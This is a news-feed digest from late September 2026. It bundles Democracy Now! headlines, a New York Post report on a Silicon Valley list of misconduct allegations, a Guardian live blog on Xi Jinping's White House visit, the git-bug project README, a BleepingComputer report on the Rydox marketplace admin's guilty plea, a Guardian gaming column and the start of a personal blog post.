Israeli Prime Minister Benjamin Netanyahu delivered a defiant speech to a half-empty chamber at the United Nations General Assembly on Thursday, after dozens of delegations walked out in protest at the start of his address. Netanyahu assailed his critics as “antisemites” and lavished praise on President Trump for joining Israel’s strikes on Iran.

Prime Minister Benjamin Netanyahu : “In this battle against the barbarians, we’ve had no greater partner than President Trump. I thank him. I thank him for his bold leadership. He boldly confronted an enormous danger to America, Israel and the world.”

Netanyahu’s remarks followed a speech by Palestinian Authority leader Mahmoud Abbas, who addressed the General Assembly by video stream, after the Trump administration denied visas to Palestinian delegates to attend the U.N. talks for the second year in a row. Abbas said Palestinians now face one of their most dangerous moments in history due to a “genocidal war that has created an unprecedented humanitarian catastrophe.”

Prime Minister Netanyahu rejected allegations of genocide in Gaza as “the biggest lie of the century,” and he lashed out at critics, including New York City Mayor Zohran Mamdani.

Prime Minister Benjamin Netanyahu : “So, to all those spreading these lies about my country and about our brave soldiers, whether they sit in this hall or in the office of the antisemitic mayor of New York, I say this: Shame on you!”

New York Mayor Mamdani responded in a statement, “As he has done time and again, Prime Minister Netanyahu used his speech to repeat baseless lies meant to sanitize his genocide of Palestinians.”

Over 100 Protesters Arrested Outside U.N. Demanding Arrest of Benjamin Netanyahu

Sep 25, 2026

Netanyahu’s speech at the General Assembly sparked demonstrations outside the United Nations on Thursday. More than 100 people were arrested during a sit-in led by Jewish Voice for Peace that blocked roads near the U.N. headquarters. Protesters held banners that read “End the Genocide” and “Stop the U.S.-Israel War Machine.” Among those arrested were Oscar-winning actor Susan Sarandon and “Hacks” star Hannah Einbinder. Democracy Now! spoke with democratic socialist congressional candidates Chris Rabb of Philadelphia and Darializa Avila Chevalier of New York City.

Darializa Avila Chevalier : “I’m here with so many New Yorkers to demand that Netanyahu be held accountable. He’s currently wanted by the ICC . And the irony is that so many New Yorkers here today will likely be the ones facing arrest, and not the person wanted for war crimes and crimes against humanity, before the very body that he’s set to speak in front of.”

Rep. Chris Rabb : “And for those of us who are going to Congress, we have a responsibility to speak up for all those folks who are on the right side of history but do not have enough people in Congress holding people like him to account. We are complicit in those atrocities. We are funding that genocide. We are showing up on the frontlines, letting people know we see them, we care, we stand in solidarity with the people of Palestine and all over the Middle East.”

We will hear more voices from Thursday’s protest after headlines.

Separatists Attack Government Forces in Ethiopia’s Worst Fighting Since 2022 Ceasefire

Sep 25, 2026

In northern Ethiopia, Tigrayan separatists have seized control of three regional airports and launched heavy artillery attacks on government forces. The fighting erupted in Tigray on Wednesday and has spread to the Afar and Amhara regions. A leader of the Tigray People’s Liberation Front told the AFP news agency, “We are in the situation of full-blown war now.” It’s the worst fighting in Ethiopia since the government and Tigray rebels agreed to a ceasefire in 2022, ending a two-year civil war that displaced millions of people, triggered a famine and left 600,000 people dead, according to African Union estimates.

Opposition Groups Protest in Caracas as Venezuela’s Leader Promises Elections at the “Right Moment”

Sep 25, 2026

Venezuela’s interim leader Delcy Rodríguez delivered her first address to the U.N. General Assembly since the U.S. abduction of Venezuelan President Nicolás Maduro back in January. Rodríguez vowed Venezuela would hold elections at the “right moment.”

Meanwhile, many in Caracas are demanding the return of opposition leader María Corina Machado, who’s been blocked from entering Venezuela three times. Machado has largely been sidelined by U.S. officials after Maduro’s abduction, even though she once had a friendly relationship with Trump as she pressured the U.S. to topple Venezuela’s government by force. She also gave President Trump her Nobel Peace Prize. This is an opposition supporter in Caracas.

Rosa Cacique : “Unfortunately, the hand of Donald Trump is involved here. It is regrettable, but that’s how it is. We are not fools; we notice what is happening. They are saying there is a change. My god, what change? Salaries are still the same. Hospitals still have no supplies. Political prisoners are still imprisoned. So what is the change? I don’t see it.”

U.S. Senate Defeats Iran War Powers Resolution on Vote of 49-50

Sep 25, 2026

The Senate has voted narrowly to reject a war powers resolution compelling President Trump to end attacks on Iran. The resolution failed on a vote of 49 to 50, with four Republicans voting in favor and Pennsylvania Senator John Fetterman the lone Democrat in opposition. The House and Senate previously approved a war powers resolution in June, but the White House ignored it, arguing it infringed on President Trump’s powers as military commander-in-chief.

Trump Hosts Xi Jinping for State Dinner, Joined by U.S. Billionaires Worth $2.4 Trillion

Sep 25, 2026

President Trump and first lady Melania Trump hosted Chinese President Xi Jinping for a state dinner at the White House on Thursday, with executives from some of the largest U.S. companies in attendance. The guest list included Elon Musk, the world’s wealthiest person; Amazon founder Jeff Bezos; OpenAI CEO Sam Altman; Google’s Sundar Pichai; Meta’s Mark Zuckerberg; Nvidia’s Jensen Huang; Microsoft CEO Satya Nadella; and Apple’s former CEO Tim Cook. Forbes reports the billionaires attending the dinner hold a combined worth of more than $2.4 trillion. They’ve nearly doubled their wealth since Trump won a second presidential term in 2024.

Banned Reporters Allowed Back into White House After Judge’s Ruling

Sep 25, 2026

In more news from Washington, the Trump administration allowed reporters from CNN , MS NOW and Politico back into the White House around noon on Thursday — 12 hours after a Trump-appointed federal judge reversed a ban on the three media outlets. However, by Thursday evening, a TV pool that provides video coverage of White House events remained suspended, with networks promising to boycott pool coverage until CNN’s participation is restored. On Thursday evening, President Trump lashed out at CNN and MS NOW on his social media site, blasting the networks for failing to provide live coverage of his meeting with President Xi Jinping.

Judge Tosses Trump’s Lawsuit Against Iowa Pollster and Newspaper, Citing First Amendment

Sep 25, 2026

An Iowa judge has dismissed Donald Trump’s lawsuit against pollster Ann Selzer and The Des Moines Register over a poll that showed Kamala Harris narrowly leading Trump in Iowa on the eve of the 2024 election. Trump went on to win Iowa, 56% to 43%. Judge Scott Beattie rejected Trump’s claim that the poll constituted a “defective product,” writing, “Simply labeling the poll a product does not change the analysis. … The rights protected by the First Amendment are not a word game.”

David Ellison Considers Tapping Elon Musk as Investor in Paramount-Warner Bros. Megamerger

Sep 25, 2026

The merger of Paramount and Warner Bros. Discovery is on hold again, despite settlements reached earlier this week among Paramount, the Writers Guild of America and a dozen state attorneys general. On Thursday, a U.S. district judge in California declined to immediately approve the consent decree, after advocacy groups filed an emergency motion seeking more time to file a formal challenge to the media megamerger. A lawyer with the Committee for the First Amendment, one of the groups opposing the $111 billion deal, said, “the consent decree fails to meaningfully address or mitigate the harms that will be caused by this monopoly merger to the entertainment industry, diverse storytelling, independent filmmaking, consumer interests, a free press, First Amendment rights, and fundamentally, democracy.”

Meanwhile, Semafor reports Paramount Skydance executives, including CEO David Ellison, asked trillionaire Elon Musk to join a team of equity investors in the media giant. David Ellison’s father, Oracle founder Larry Ellison, previously invested $1 billion in Musk’s hostile takeover of Twitter and served on Tesla’s board of directors.

House Democrats Decry “Abusive and Life-Threatening Conditions” in Florida ICE Jails

Sep 25, 2026

Democrats on the House Oversight Committee are demanding answers from the Trump administration after whistleblowers described dangerous conditions and illegal practices inside the Miramar ICE jail in Florida. In a letter to the acting director of ICE and the Homeland Security inspector general, Congressmembers Robert Garcia, Bennie Thompson and Maxwell Frost write, ” ICE is detaining people — including men, women, families, and elderly people with chronic medical conditions — for days to weeks in abusive and life-threatening conditions, including overcrowded cells, prolonged shackling, inadequate access to medical care and hygiene, insufficient food, and limited to no legal access. ICE is simultaneously attempting to cover up these horrific practices.” Miramar at one point held 342 people instead of its maximum capacity of 50.

Protests Erupt in Spanish Capital over Forced Eviction of 87-Year-Old Woman

Sep 25, 2026

In Spain, thousands of protesters have taken to the streets of Madrid and other cities across the country amid outcry over the eviction of an 87-year-old woman from her home. Maricarmen Abascal resided in her apartment for most of her life — for more than 70 years. A developer bought the apartment building, more than tripling her rent to over $1,800. That’s more than Maricarmen’s monthly state pension of about $1,500. On Wednesday, police arrived at the residence and broke down the door of her home, forcibly removing her on a stretcher. She was reportedly given about 30 minutes to pack her essentials. As Maricarmen was driven away in an ambulance, supporters shouted “You’re not alone!” She remained hospitalized Thursday. Her eviction has renewed anger over Spain’s worsening housing affordability crisis, and calls for the government of Spanish Prime Minister Pedro Sánchez to enact stronger policies to protect tenants. This is a university employee speaking from Madrid.

Lucía Nistal : “It’s simply the best illustration. It shows exactly what these evictions in the service of big business are all about. What lies ahead is a continued pursuit of profit at the expense of a basic right. Right now there is a great deal of pain and a great deal of anger, but we’re going to keep fighting.”

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

Non-commercial news needs your support

We rely on contributions from our viewers and listeners to do our work.
Please do your part today.

Make a donation

Silicon Valley 'sex assault list' with 'over 100' names circulated

Hacker News
nypost.com
2026-09-25 07:52:27
Comments...
Original Article

A private spreadsheet naming “over a hundred” alleged sexual predators in Silicon Valley includes “prominent investors and businessmen,” sources tell The Post.

One up-and-coming tech worker, who asked not to be identified, described how she was shocked when she saw the names on the list which she added her own account of sexual misconduct to.

“Some of them were very prominent names, you know? People who were famous investors. Businessmen who were in the scene, I had seen them at parties before.”

A gathering at Silicon Valley tech house. launchhouse/Instagram

The closely guarded list of tech predators serves as a way of warning others, multiple Silicon Valley insiders who have seen the list said. They noted it contains allegations of drugging, sex assaults and rapes and includes names of people at the biggest tech and Artificial Intelligence companies.

However, verifying the authenticity of the accounts is another question.

The source who had added to the document, who is in her 20s, says she was approached and invited to add her harrowing ordeal after she had mentioned it to others.

“I met some women who ran the ‘whisper network,’ it has hundreds of cases,” she told The Post. “I only found out about it because I started asking around.”

Sources said many women in Silicon Valley feel unable to approach police when bad things happen to them at the hands of the tech elite and they fear retaliation from the powerful people they accuse, knowing speaking up could end their budding careers.

“I was worried that if I tried for justice in my case and I lost, I would be blacklisted from every investor in town,” she said.

Yehong Zhu is pictured on Friday, Dec. 4, 2020. Courtesy of Yehong Zhu

Worrying incidents described to The Post by four sources took place in so called “hacker houses,” where people who share a kitchen or party invitations may also be sharing investments, working together or making introductions to a future employer. Those overlapping relationships can become awkward when the lines are blurred.

A second insider speaking on background described to The Post a predatory approach from some males in which friendship is used to get close to someone, learn their vulnerabilities and then push past boundaries.

The insider claimed some tech predators seek people to manipulate — preying on the isolated or vulnerable. Often these are younger girls or those who have recently arrived in the country or Silicon Valley hoping to make a name for themselves.

The insider also said the opposite is also true — some target successful, independent people whom an abuser would regard as a “trophy.”

A view of one of the Silicon Valley tech hacker houses. AGI House / X

“Some predators want the shiniest star, the harder you are to take down, the more powerful they feel. It’s a conquest,” they said.

The insider noted a culture which celebrates founders, who made their careers refusing to accept rejection in business, can become dangerous when the same is applied to social situations.

Neither the people causing harm nor those being harmed are necessarily one gender, the insider emphasized.

Yehong Zhu, who has lived in several hacker houses, said she was also a victim of rape. In her case, the person she accused was someone she had considered a friend.

Yehong Zhu with friends at a tech party. Courtesy of Yehong Zhu

She filed a December 2021 police report accusing the person, a former member of San Francisco “hacker house” Genesis, of rape and assault.

Zhu, founder of the app Zette, says the man fled, and has not been located or arrested, despite other people in their friendship circle keeping in contact with him.

“I kept saying no [to him],” she told The Post.

After the alleged rape, she says, a female friend worried aloud about the damage her accusation would do to his reputation. A house organizer discouraged her from going to the police, then proposed a committee and a vote when Zhu wanted him removed.

Jeremy Nixon, who has established tech group homes in and around San Francisco, is pictured at NeoGenesis in Hillsborough. Jeremy Nixon / X

She went to police and retained lawyers. She contacted people who knew the alleged attacker, hoping someone could help locate him, but many did not answer.

“We invested together. We did business together,” she said of those who refused to help her.

Michael Burshteyn, a lawyer for Genesis founder Jeremy Nixon, told The Post that his client was unaware of the specific situation described to him.

A social media post by Yehong Zhu on X regarding an assault at a San Francisco group house called The Muse. @YehongZhu/X

“But he would support and encourage law enforcement and just complying with the law in any situation like that and prioritize safety,” Burshteyn said.

A separate, written account from Muse, another San Francisco “community house,” described a date rape.

Its anonymous author — who was identified to The Post but declined to comment — claims she was living at the house on a trial basis when a man vouched for by the community offered her ketamine in January 2025. The alleged victim claims she said while sober that she did not want sex, but the man had sex while she was heavily impaired after repeated doses of ketamine.

When she then told one of the people running the house, she writes, he minimized what happened and encouraged a mediated conversation, which would allow the alleged attacker to return.

The victim didn’t agree and says she was told to leave the house by the end of March, the alleged attacker was even allowed to attend a house celebration before her departure.

Launch House is one of the places which incubate promising tech workers in Silicon Valley. launchhouse/Instagram

Some residents later supported the woman, including another female in the house who helped bring her full account to others in the house, the document says. But the anonymous writer says the community declined to issue a public statement acknowledging failures, which she requested. The Muse house did not respond to a request for comment.

Meanwhile, a former resident of Launch House, a Beverly Hills-based founder community in Southern California, described a markedly different response when she and other women sought help.

The woman, who asked to remain anonymous, said she suspected she had been drugged during a gathering. She could not remember parts of the night and learned afterward that a friend had helped her into bed.

“I had the chills and I was sweating at the same time, almost like I had the flu. And I was outside on the patio in the sun, I could not move,” she told The Post.

Other women told her the same man had touched them inappropriately or made unwanted advances, she said. Those who had been affected went to the house’s founders together.

“They got rid of him immediately, he was kicked out of the house,” the woman said.

Co-founder Brett Goldstein and another founder spoke with the women, changed the locks and offered to help them contact police. However, she decided against doing so because she could not remember what happened or establish it through witnesses.

“I did stay on and felt safe in the house,” she added.

However, the assailant subsequently targeted her and the company online, including through private messages, she claimed.

“I worry that if I find any type of success that is in public, he’s going to come back and make me feel even worse,” she added.

Goldstein told The Post Launch House is no longer operating in the same form and added: “We developed Launch House’s conduct policies and incident-response procedures with input from a relevant HR executive, a DEI & Safety consulting firm …  anyone running an in-person experience has a responsibility to continuously improve the safety of their operation.”

None of these allegations are new, and warnings about entwined group living environments have circulated for years. In 2022, AI researcher Keerthana Gopalakrishnan wrote about sexual pressure in Effective Altruism circles.

She challenged reliance on community mediation for sexual-assault complaints, while calling for greater clarity in distinguishing between coercion and consensual polyamory.

Zhu says she went public with her story in the hopes of helping other women come forward and avoid the same fate.  She says she founded Zette to make quality journalism easier to access while helping publishers earn money.  She wants to be known for what she builds, too.

“I don’t want this issue to be the only thing attached to my name,” she said. “I have so many dreams to build.”

US politics live: Trump to wrap up Xi summit with a tour of US archives

Guardian
www.theguardian.com
2026-09-25 07:48:35
Xi is expected to depart Washington after touring the nation’s vault of records, where the Declaration of Independence, the Constitution and the Bill of Rights are heldSign up for US Breaking News emailsIn our second live discussion ahead of the elections, Joseph Gedeon, Dara Kerr and Chris Stein wi...
Original Article

Trump to wrap up Xi summit with a tour of US archives

Hello and welcome to the US politics live blog.

Donald Trump is taking Chinese president Xi Jinping to visit the National Archives later today, showing off the sacred texts of US democracy to the leader of the world’s most powerful communist country.

Xi is expected to depart Washington after touring the nation’s vault of records, where the Declaration of Independence, the Constitution and the Bill of Rights are held, AP reported.

The three-day state visit came as the US celebrates the 250th anniversary of its founding and Trump said on Thursday that he wanted to show Xi “some of the greatest treasures of that proud history.”

The archives has a special exhibit marking the sesquicentennial, titled ‘The American Story,’ which highlights the country’s accomplishments and advances, along with images depicting its darker moments.

Trump showed Xi one copy of the Declaration of Independence on Thursday - a wall-mounted copy he keeps in the Oval Office. The US president also said he wanted to show Xi artefacts about the relationship between the two countries.

“Just as our ancestors reached across the ocean centuries ago to trade, to learn, and to build a better world, our two countries do really the same thing, and we’re very proud of it,” he said.

Xi’s day will begin at the White House, where Trump and first lady Melania Trump will host the Chinese leader and his wife, Peng Liyuan, for tea.

In other developments:

  • Donald Trump welcomed Xi Jinping to the White House for a state dinner in honor of the Chinese leader that was not televised because the White House continued to deny full access to the event to CNN journalists on Thursday, despite a court order.

  • Writing on his social media platform, Trump complained that two of the three outlets he banned from the White House, CNN and MS Now, “refused to cover” his elaborate welcome of Xi to the White House. He did not mention that the two broadcasters were not in position to cover the event live because his own actions and those of his aides, who continued to block their reporters.

  • As Israel’s prime minister Benjamin Netanyahu attacked him at the UN, New York’s mayor, Zohran Mamdani , doubled down on his support for Palestinians by making public video of himself hosting Palestinian families from Gaza.

  • Darializa Avila Chevalier , the Democratic socialist congressional candidate from New York, was among dozens of activists arrested near the United Nations on Thursday at a protest against Netanyahu’s appearance organized by Jewish Voice for Peace.

  • The Trump administration used taxpayer funds to air a White House-produced, pro-Trump ad on Fox News this week.

Key events

In our second live discussion ahead of the elections, Joseph Gedeon, Dara Kerr and Chris Stein will join us at 11am EDT (4pm BST) to answer your questions about who is backing candidates in the upcoming midterms.

Our reporters will cover who is funding the campaigns, where the money is going and how it’s shaping the election outlook ahead of the votes on 3 November.

You can follow along here later today:

CNN and MS Now journalists denied access to White House state dinner despite court ruling

Jeremy Barr

Journalists for CNN and MS Now were denied access to the White House state dinner in honor of Xi Jinping, China’s president, on Thursday evening, hours after a federal judge ruled the Trump administration must allow them in after imposing a ban last week.

“About an hour before Xi’s arrival was scheduled, the White House said CNN could cover the event, but only with a photojournalist and audio technician, notably excluding the network’s editorial team consisting of a reporter and producer,” CNN reported .

MS Now, another outlet banned from the White House by Trump last week for what he calls overly negative coverage of his presidency, also said its White House reporter, Laura Barrón-López, was prevented from covering Xi’s arrival for the state dinner despite applying for credentials to cover the event. When Barrón-López asked a White House staffer why she was denied access, the staffer said she should “talk to Steven”, apparently meaning White House communications director Steven Cheung, MS Now reported.

Xi’s arrival for the dinner, with his wife, Peng Liyuan, was streamed live on YouTube by the White House, but none of the major US networks provided live broadcast video of the event in solidarity with CNN , a member of the broadcast pool.

Earlier on Thursday, journalists for CNN, MS Now and Politico, which was also part of the ban issued last week, were finally granted access to the White House after days of being barred from the building.

Earlier attempts by the journalists to enter the building had been unsuccessful, and lawyers representing the three organizations had told a judge that the White House has already “repeatedly violated” his overnight order requiring the Trump administration to return the press badges of journalists from the three news organizations.

Timothy Kelly, the US district judge who appeared skeptical of arguments from lawyers representing the White House during a hearing on Wednesday, issued an early morning order forcing the administration to return access for a 14-day period.

Trump to wrap up Xi summit with a tour of US archives

Hello and welcome to the US politics live blog.

Donald Trump is taking Chinese president Xi Jinping to visit the National Archives later today, showing off the sacred texts of US democracy to the leader of the world’s most powerful communist country.

Xi is expected to depart Washington after touring the nation’s vault of records, where the Declaration of Independence, the Constitution and the Bill of Rights are held, AP reported.

The three-day state visit came as the US celebrates the 250th anniversary of its founding and Trump said on Thursday that he wanted to show Xi “some of the greatest treasures of that proud history.”

The archives has a special exhibit marking the sesquicentennial, titled ‘The American Story,’ which highlights the country’s accomplishments and advances, along with images depicting its darker moments.

Trump showed Xi one copy of the Declaration of Independence on Thursday - a wall-mounted copy he keeps in the Oval Office. The US president also said he wanted to show Xi artefacts about the relationship between the two countries.

“Just as our ancestors reached across the ocean centuries ago to trade, to learn, and to build a better world, our two countries do really the same thing, and we’re very proud of it,” he said.

Xi’s day will begin at the White House, where Trump and first lady Melania Trump will host the Chinese leader and his wife, Peng Liyuan, for tea.

In other developments:

  • Donald Trump welcomed Xi Jinping to the White House for a state dinner in honor of the Chinese leader that was not televised because the White House continued to deny full access to the event to CNN journalists on Thursday, despite a court order.

  • Writing on his social media platform, Trump complained that two of the three outlets he banned from the White House, CNN and MS Now, “refused to cover” his elaborate welcome of Xi to the White House. He did not mention that the two broadcasters were not in position to cover the event live because his own actions and those of his aides, who continued to block their reporters.

  • As Israel’s prime minister Benjamin Netanyahu attacked him at the UN, New York’s mayor, Zohran Mamdani , doubled down on his support for Palestinians by making public video of himself hosting Palestinian families from Gaza.

  • Darializa Avila Chevalier , the Democratic socialist congressional candidate from New York, was among dozens of activists arrested near the United Nations on Thursday at a protest against Netanyahu’s appearance organized by Jewish Voice for Peace.

  • The Trump administration used taxpayer funds to air a White House-produced, pro-Trump ad on Fox News this week.

Git-bug: Distributed, offline-first bug tracker embedded in Git

Hacker News
github.com
2026-09-25 07:38:31
Comments...
Original Article

git-bug is a bug tracker that:

  • is fully embedded in git : you only need your git repository to have a bug tracker
  • is distributed : use your normal git remote to collaborate, push and pull your bugs!
  • works offline : in a plane or under the sea? Keep reading and writing bugs!
  • prevents vendor lock-in : your usual service is down or went bad? You already have a full backup.
  • is fast : listing bugs or opening them is a matter of milliseconds
  • doesn't pollute your project : no files are added in your project
  • integrates with your tooling : use the UI you like (CLI, terminal, web) or integrate with your existing tools through the CLI or the GraphQL API
  • bridges to other bug trackers : use bridges to import and export to other trackers.

Installation

See INSTALLATION.md for the complete guide, including how to build from source and verify your install.

Workflows

There are multiple ways to use git-bug . See the workflow documentation for the details.

Native workflow

Native workflow

This is the pure git-bug experience. In a similar fashion as with code, use git bug push and git bug pull to push and pull your bugs between git remotes and collaborate with your teammate.

Bridge workflow

Bridge workflow

As git-bug has bridges with other bug-trackers, you can use it as your personal local remote interface. Sync with git bug bridge pull and git bug bridge push , work from your terminal, integrate into your editor, it's up to you. And it works offline!

Web UI workflow (WIP)

Web UI workflow

Often, projects need to have their bug-tracker public and accept editions from anyone facing a problem. To support this workflow, git-bug aims to have the web UI accept external OAuth authentication and act as a public portal. However the web UI is not up to speed for that yet. Contributions are very much welcome!

CLI usage

Create a new identity:

Create a new bug:

Your favorite editor will open to write a title and a message.

You can push your new entry to a remote:

And pull for updates:

List existing bugs:

Filter and sort bugs using a query :

git bug ls "status:open sort:edit"

Search for bugs by text content:

You can now use commands like show , comment , open or close to display and modify bugs. For more details about each command, you can run git bug <command> --help or read the command's documentation .

Interactive terminal UI

An interactive terminal UI is available using the command git bug termui to browse and edit bugs.

Termui recording

Web UI

You can launch a rich Web UI with git bug webui . Browse, search and filter issues, open new ones, comment, and edit titles, labels and status. It also doubles as a code browser for your repository, with a file tree, syntax-highlighted files, commit history and diffs.

An issue with its comments and timeline

Browsing the repository code

The web UI is packed inside the same go binary and served by a local http server. It talks to the backend through a GraphQL API, whose schema is available here .

Bridges

git-bug can import from and export to Github, Gitlab, Jira and Launchpad. See the feature matrix for what each bridge supports, and the bridge documentation for the full guide.

Interactively configure a new bridge:

Or manually:

git bug bridge new \
    --name=<bridge> \
    --target=github \
    --url=https://github.com/git-bug/git-bug \
    --login=<login> \
    --token=<token>

Import bugs:

git bug bridge pull [<name>]

Export modifications:

git bug bridge push [<name>]

Delete a bridge:

git bug bridge rm [<name>]

Internals

Interested in how it works? Have a look at the data model and the internal bird-view .

The on-disk format is formally specified in the git-bug spec , covering the DAG entity format, identities and the bug entity. Read that if you want to write another implementation or a tool that reads git-bug data directly.

Or maybe you want to make your own distributed data-structure in git ?

See also all the docs .

Misc

Planned features

The feature matrix gives a good overview of what is planned, without being exhaustive.

Additional planned features:

  • webUI that can be used as a public portal to accept user's input
  • inflatable raptor

Contribute

PRs accepted. Drop by the Matrix room for a chat, look at the feature matrix or browse the issues and discussions to see what is worked on or discussed.

See CONTRIBUTING.md to get a development environment going, build the project and run the tests. To work on the web UI, have a look at its dedicated README .

Contributors ❤️

This project exists thanks to all the people who contribute.

Backers & sponsors

Thank you to all our backers and sponsors! 🙏 [ Become a backer or sponsor ]

Backers

Sponsors

License

Unless otherwise stated, this project is released under the GPLv3 or later license © Michael Muré.

The git-bug logo by Viktor Teplov is released under the Creative Commons Attribution 4.0 International (CC BY 4.0) license © Viktor Teplov.

Rydox marketplace admin pleads guilty, faces 22 years in prison

Bleeping Computer
www.bleepingcomputer.com
2026-09-25 07:35:14
A Kosovar national has pleaded guilty to operating Rydox, a large illegal online marketplace that sold stolen personal information, login credentials, credit card details, and cybercrime tools. [...]...
Original Article

Hacker prison

A Kosovar national has pleaded guilty to operating Rydox, a large illegal online marketplace that sold stolen personal information, login credentials, credit card details, and cybercrime tools.

Kosovo law enforcement and Albania's Special Anti-Corruption Body (SPAK) arrested 28-year-old Ardit Kutleshi and two other Rydox administrators (Jetmir Kutleshi and Shpend Sokoli) in December 2024.

The arrests were part of a joint international law enforcement operation that also shut down the Rydox marketplace , seized the Rydox[.]cc domain, and seized its servers in Kuala Lumpur with the help of the Royal Malaysian Police.

Ardit Kutleshi was extradited from Kosovo to the United States in 2025, when he was charged with crimes related to their Rydox admin role, including conspiracy to commit identity theft, aggravated identity theft, two counts of identity theft, access device fraud, and money laundering.

"Rydox put cybercriminal tools and sensitive data up for sale, including the stolen identities and logins of thousands of people," said Brett Leatherman, assistant director of the FBI's Cyber Division. "The FBI and its foreign partners shut the marketplace down, and now the man who created it and ran it pleaded guilty."

​ According to court documents , between February 2016 and Rydox's shutdown in 2024, marketplace sellers were involved in over 7,600 sales of login credentials, credit card information, and stolen personal information (including Social Security numbers, names, and addresses) of thousands of U.S. citizens.

Rydox also offered over 321,000 other "cybercrime products" for sale to more than 18,000 users, including various devices, software tools, and materials for committing cybercrimes.

Rydox seizure banner
Rydox seizure banner (BleepingComputer)

Rydox users had to deposit cryptocurrency into their accounts before making a purchase via Bitcoin ("BTC"), Monero, Ripple, Ethereum, Litecoin, Perfect Money, Tron, or Verge payments that were deposited into a Rydox-controlled cryptocurrency wallet and could be used to buy illicit products, services, tools, and programs from Rydox sellers.

The marketplace also charged registered users a one-time fee (that fluctuated between $200 and $500) to become authorized sellers, who received 60% of the sale proceeds, while the marketplace retained 40% from every sale.

Kutleshi has pleaded guilty to aggravated identity theft and money laundering conspiracy and is scheduled to be sentenced on February 9, 2027.

He now faces a maximum penalty of 20 years in prison for money laundering and a minimum penalty of two years in prison for the aggravated identity theft count.

Since the start of the year, the owner of the Incognito dark web drugs market was sentenced to 30 years in prison in February, while a California man who sold fentanyl and methamphetamine on the Nemesis dark web marketplace was sentenced to more than 26 years in federal prison.

article image

Build your security blueprint for AI-powered attacks

Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed.

Save your seat

Playing video games with my 22-year-old son has brought me to tears | Dominik Diamond

Guardian
www.theguardian.com
2026-09-25 07:30:48
I’ve been holed up in an flat, affectionately dubbed the ‘brotel’, with my son for weeks – and we’ve revisited the first game we ever played together I have spent the last three weeks living with my 22-year-old son in a two-bedroom flat he has dubbed the ”brotel”. We cook curries and watch Lanterns....
Original Article

I have spent the last three weeks living with my 22-year-old son in a two-bedroom flat he has dubbed the ”brotel”. We cook curries and watch Lanterns . We barbecue meat and analyse Tarantino movies. We get pizza and we play video games. Boy, do we play video games!

The first game I ever played in co-op with him was Call of Duty: Modern Warfare 2 in 2009, when he was five. He wasn’t the most accomplished sidekick, not so great at placing a mobile gun turret while under fire from what seems like a bazillion enemy soldiers, but we had a laugh. It started the video game bond between us before his sister introduced him to Banjo-Kazooie and Rayman, and he stopped being a preschool warmonger. Probably for the best. So how would it be tackling the same game nearly two decades later?

We start with the two Special Ops missions we used to play. We never completed them because, once again, he was five – and I am left-handed, which makes me rubbish at joypad-controlled first-person shooters without the help of auto targeting. Thankfully, one of those circumstances has now changed.

Call of Duty: Modern Warfare 2’s Evasion mission
Guard dogs in the snow … Call of Duty: Modern Warfare 2’s Evasion mission. Photograph: Activision

The first mission is officially called Evasion, but to us it has always been “the guard dogs in the snow”, because they got us every time we played. Our initial attempts highlight the differences between us as gamers. And men, if I’m being honest.

I am paranoid. I sense calamity around every corner, so I creep forwards, mostly crouching, frequently crawling on my belly, slowly and carefully scouting for enemies using my sniper scope. Charlie is running through the level firing from the hip like Leeroy bloody Jenkins . Which means he alerts all the dogs, who for some reason are able to smell me from miles away and nom nom nom me to oblivion.

We fail. We fail again. But we are having so much fun.

Teamwork eventually emerges through compromise. He holds back a bit, I grow less timid. I snipe from a distance, he finishes them off up close. And, most importantly, we take out the guard dogs first. We realise that was where we went wrong two decades ago. These dogs are superhuman. I would love a level where you got to play as them.

We finally complete the mission. It has only taken us 17 years! We go straight into the other level that we never conquered: Homeland Security, AKA “defend the garage from five waves of attack”. This takes a fair few goes, but we have such great communication by this time that it’s never a chore. We leap from our twin La-Z-Boy chairs in celebration when we win.

We gambol through mission after mission. Suspension, AKA “bridge with helicopters”, is a riot from start to finish. We have a great rhythm. I bazooka from afar, Charlie sprints in to mop up. In Snatch and Grab, we take a computer file then boot it from an aircraft graveyard, avoiding helmeted Juggernauts; it’s pure unadulterated gaming joy. Even when, once again, we fail.

As I am writing this, thanks to whatever AI is lurking in my computer scanning everything I type or possibly even think, an article pings up about the online gaming cheat industry, which is now apparently worth $8.5bn. I’m sure there are reasons why people invest so much money in cheating – but talk about ripping the soul out of something fun.

Call of Duty: Modern Warfare 2’s multiplayer.
A familiar sight … Call of Duty: Modern Warfare 2’s multiplayer. Photograph: Activision

I have loved these last few weeks gaming with my son. I feel like I have gone back to basics. After decades as an uptight stressed dad, I am finally carefree, because I have recently gone back to working for myself. And I am a very forgiving boss. Sitting there with pizza, beer and another bloke, playing games till the wee small hours without a care in the world … this is what gaming was like for me when I was my son’s age.

skip past newsletter promotion

I’m not sure you ever top that period in your life as a gamer – when you get that first job that allows you to leave home, get your own place, buy whatever game you want and play it to your heart’s content, before you become burdened by the responsibilities of relationships, mortgages, parenthood and, worst of all, ambition.

When those things arrive, you are lucky to squeeze in an hour of play here and there. You just try to get as far through a game as you can in that time because you don’t know when the next free hour will come, and you still feel guilty because you feel you should be doing something more grownup instead. You know, something that might help pay the rent.

Now, though, I am back in gaming heaven. It won’t be for ever: my son and I are due to move to different parts of the world in a few months. But he turns to me after one session and says that he will look back on this as some of the best times we ever had together.

I turn my head because I am still a Scottish dad and I don’t want him to see me cry. Even if those tears are the most beautiful big, happy ones.

Grieving the loss of details

Lobsters
purplesyringa.moe
2026-09-25 07:29:33
Comments...
Original Article

I’ve been thinking about where I stand in respect to the current state of the industry. This is more of a journal note than a post, apologies for that. I usually leave this stuff private, but I thought I’d post this as a trial in case someone relates to this experience and feels less alone. All opinions are my own.


Before the term “vibecoding” was coined and the industry shifted to valuing programmers primarily for designing architecture, I proudly called myself a coder as opposed to an engineer. In my eyes, this highlighted the way I focused on the details, performance optimization, knowing the intricacies of the language, and being able to explain how things work, as opposed to juggling Java-esque abstractions.

Of course, this was partially a misconception, but I can’t help but notice how the opportunities to use my strongest sides are getting away, and the industry is switching to a model my mind is incapable of working with.


I first became familiar with computing when I saw the history scene in Tron: Legacy :

